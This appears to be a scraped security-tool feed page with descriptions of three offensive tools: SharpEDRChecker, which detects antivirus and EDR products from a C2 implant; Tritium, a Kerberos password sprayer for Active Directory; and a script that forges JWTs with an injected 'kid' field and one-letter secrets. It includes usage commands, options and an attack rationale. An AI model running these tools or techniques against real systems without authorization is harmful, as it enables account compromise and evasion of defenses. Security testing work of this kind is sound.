SharpEDRChecker - Checks Running Processes, Process Metadata, DLLs Loaded Into Your Current Process And The Each DLLs Metadata, Common Inst all Directories, Installed Services And Each Service Binaries Metadata, Installed Drivers And Each Drivers Metadata, All For The Presence Of Known Defensive Products Such As AV's, EDR's And Logging Tools

$
0
0

New and improved C# Implementation of Invoke-EDRChecker. Checks running processes, process metadata, Dlls loaded into your current process and each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools. Catches hidden EDRs as well via its metadata checks, more info in a blog post coming soon.

This binary can be loaded into your C2 server by loading the module then running it. Note: this binary is now included in PoshC2 so no need to manually add it.


I will continue to add and improve the list when time permits. A full roadmap can be found below.

Find me on twitter@PwnDexter for any issues or questions!


Install & Compile

Git clone the repo down and open the solution in Visual Studio then build the project or alternatively download the latest release from here.

git clone https://github.com/PwnDexter/SharpEDRChecker.git

Usage

Once the binary has been loaded onto your host or into your C2 of choice, you can use the following commands:

Run the binary against the local host and perform checks based on current user integrity:

.\SharpEDRChecker.exe
run-exe SharpEDRChecker.Program SharpEDRChecker

For use in PoshC2 ise the following:

sharpedrchecker

Roadmap
  • Add more EDR Products - never ending
  • Test across more Windows and .NET versions
  • Add remote host query capability
  • Port to python for unix/macos support

Example Output

Initial start down C2:

 

Processes:


Modloads in your process:


Directories:


Services:


Drivers:


 TLDR Summary:



Tritium - Password Spraying Framework

$
0
0


A tool to enumerate and spray valid Active Directory accounts through Kerberos Pre-Authentication.


Background

Although many Kerberos password spraying tools currently exist on the market, I found it difficult to find tools with the following built-in functionality:

  • The ability to prevent users from locking out the domain
  • The ability to integrate username enumeration with the password spraying process (User enumeration is a seperate functionality from the spray)
  • The ability to recursively spray passwords rather than running one spray at a time
  • The ability to resume password sprays and ignore previously compromised accounts

Tritium solves all of the issues mentioned above and more. User enumeration will no longer waste a login attempt because it uses the output of the first spray to generate a file of valid users. Tritium also gives the user the ability to pass it a password file to recursively spray passwords. And Finally, Tritium has built in functionality to detect if a domain is being locked out due to password spraying by saving the state and quitting the password spray if 3 consecutive accounts are locked out.


Usage
 ./Tritium -h

___________ .__ __ .__
\__ ___/______|__|/ |_|__|__ __ _____
| | \_ __ \ \ __\ | | \/ \
| | | | \/ || | | | | / Y Y \
|____| |__| |__||__| |__|____/|__|_|__/ v 0.4


Author: S4R1N, alfarom256



Required Params:

-d The full domain to use (-domain targetdomain.local)
-dc Domain controller to authenticate against (-dc washingtondc.targetdomain.local)
-dcf File of domain controllers to authenticate against
-u Select single user to authenticate as (-user jsmith)
-uf User file to use for password spraying (-userfile ~/home/users.txt)
-p Password to use for spraying (-password Welcome1)

Optional:

-help Print this help menu
-o Tritium Output file (default spray.json)
-w Wait time between authentication attempts [Default 1] (-w 0)
-jitter % Jitter between authentication attempts
-rs Enable recursive spraying
-ws Wait time between sprays [Default 3600] (-ws 1800)
-pwf Password file to use for recursive
-res Continue a password spraying campaign
-rf Tritium Json file

Under Development

Below are some of the features being developed:

  • Ability to capture ^C and save state if process was killed manually
  • Other stuff ;)


JWT Key ID Injector - Simple Python Script To Check Against Hypothetical JWT Vulnerability

$
0
0


Simple python script to check against hypothetical JWT vulnerability.


Let's say there is an application that uses JWT tokens signed HS256 algorithm. An example token looks like the follow:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.zbgd5BNF1cqQ_prCEqIvBTjSxMS8bDLnJAE_wE-0Cxg

Above token can be decoded to the following data:

{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
}

To calculate signature the following secret is used:

supersecret

The following pseudo code is used to calculate signature:

$alg = "sha256";
$data = "...";
$key = "supersecret";

hmac($alg, $data, $key);

But what if unexpected "kid":0 field will be injected into the header?

{
"alg": "HS256",
"typ": "JWT",
"kid": 0
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
}

kid field is a standard way to choose a key. My assumption is that, if kid field is not expected, there may be vulnerable implementation that will treat the string $key value as an array:

hmac($alg, $data, $key[kid]);

As results "s" ($key[0]) value will be used as an HMAC secret.


Usage

injector.py script takes original JWT token, injects "kid":0 field into the header and generates tokens signed with the one-letter secrets (ASCII codes: 32 - 126 [{space}, !, ", #, ..., x, y, z, {, |, }, ~]):

python3 injector.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.zbgd5BNF1cqQ_prCEqIvBTjSxMS8bDLnJAE_wE-0Cxg

As results two files are created - tokens.txt and tokens_meta.txt. tokens.txt contains generated tokens and can be used as a list of payloads for the Burp Intruder. If any token is valid (what means that application is vulnerable), tokens_meta.txt file can be used to check what algorithm and secret were used to generate the given token. tokens_meta.txt file contains the following data:

token1:algorithm:secret
...
token{n}:algorithm:secret

Changes

Please see the CHANGELOG



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>